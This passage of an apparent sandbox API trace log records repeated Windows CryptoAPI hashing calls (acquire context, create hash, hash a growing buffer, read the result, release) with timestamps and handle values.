(hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.198] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.198] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.199] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0151.199] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.199] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64550 [0151.199] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e64550, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64550, pdwDataLen=0xce51c) returned 1 [0151.199] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.199] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.199] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0151.199] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.199] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0151.199] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.199] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63d10 [0151.199] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63d10, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63d10, pdwDataLen=0xce51c) returned 1 [0151.199] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.199] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0151.199] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0151.200] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.200] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0151.200] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.200] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64610 [0151.200] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64610, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64610, pdwDataLen=0xce51c) returned 1 [0151.200] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.200] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0151.200] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.201] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.201] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0151.201] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.201] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63d40 [0151.201] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63d40, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63d40, pdwDataLen=0xce51c) returned 1 [0151.201] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.201] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.201] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0151.201] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.201] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0151.201] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.201] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63d70 [0151.201] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63d70, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63d70, pdwDataLen=0xce51c) returned 1 [0151.201] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.201] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0151.201] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0151.202] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.202] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0151.202] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.202] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63e00 [0151.202] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63e00, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63e00, pdwDataLen=0xce51c) returned 1 [0151.202] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.202] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0151.202] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0151.203] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.203] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0151.203] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.203] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63e30 [0151.203] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e63e30, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63e30, pdwDataLen=0xce51c) returned 1 [0151.203] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.203] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0151.203] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.203] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.204] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0151.204] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.204] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63e60 [0151.204] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63e60, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63e60, pdwDataLen=0xce51c) returned 1 [0151.204] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.204] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.204] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.204] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.204] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0151.204] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.204] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63e90 [0151.204] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63e90, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63e90, pdwDataLen=0xce51c) returned 1 [0151.204] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.204] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.204] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0151.205] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.205] CryptHashData (hHash=0x332b7900, pbData=0x32e5fa80, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0151.205] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.205] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63ec0 [0151.205] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x2, pbData=0x32e63ec0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63ec0, pdwDataLen=0xce51c) returned 1 [0151.205] CryptDestroyHash (hHash=0x332b7900) returned 1 [0151.205] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0151.205] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.206] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.206] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0151.206] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.206] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64760 [0151.206] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e64760, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64760, pdwDataLen=0xce51c) returned 1 [0151.206] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.206] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.206] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.206] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.206] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0151.206] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64820 [0151.207] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64820, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64820, pdwDataLen=0xce51c) returned 1 [0151.207] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.207] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.207] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.207] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.207] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0151.207] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.207] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64880 [0151.207] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64880, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64880, pdwDataLen=0xce51c) returned 1 [0151.207] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.207] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.207] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.208] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.208] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0151.208] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.208] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64a30 [0151.208] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64a30, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64a30, pdwDataLen=0xce51c) returned 1 [0151.208] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.208] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.208] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.209] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.209] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0151.209] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64850 [0151.209] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64850, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64850, pdwDataLen=0xce51c) returned 1 [0151.209] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.209] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.209] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.209] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.209] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0151.209] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e648b0 [0151.209] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e648b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e648b0, pdwDataLen=0xce51c) returned 1 [0151.209] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.209] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.209] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.210] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.210] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0151.210] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.210] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64700 [0151.210] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64700, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64700, pdwDataLen=0xce51c) returned 1 [0151.210] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.210] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.210] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0151.211] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.211] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0151.211] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.211] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64970 [0151.211] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64970, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64970, pdwDataLen=0xce51c) returned 1 [0151.211] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.211] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0151.211] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.211] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.211] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0151.211] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.211] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64940 [0151.211] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64940, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64940, pdwDataLen=0xce51c) returned 1 [0151.212] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.212] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.212] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.212] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.212] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0151.212] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.212] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e649a0 [0151.212] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e649a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e649a0, pdwDataLen=0xce51c) returned 1 [0151.212] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.212] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.212] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.213] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.213] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0151.213] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.213] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64790 [0151.213] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e64790, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64790, pdwDataLen=0xce51c) returned 1 [0151.213] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.213] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.213] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0151.214] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.214] CryptHashData (hHash=0x332b7970, pbData=0x32e5fa80, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0151.214] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.214] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64910 [0151.214] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e64910, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64910, pdwDataLen=0xce51c) returned 1 [0151.214] CryptDestroyHash (hHash=0x332b7970) returned 1 [0151.214] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0151.214] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0151.214] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.214] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0151.214] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.214] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e649d0 [0151.214] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e649d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e649d0, pdwDataLen=0xce51c) returned 1 [0151.214] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.215] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0151.215] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.215] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.215] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0151.215] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.215] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e647f0 [0151.215] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e647f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e647f0, pdwDataLen=0xce51c) returned 1 [0151.215] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.215] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.215] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.216] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.216] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0151.216] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.216] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64a00 [0151.216] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e64a00, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64a00, pdwDataLen=0xce51c) returned 1 [0151.216] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.216] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.216] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.217] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.217] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0151.217] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 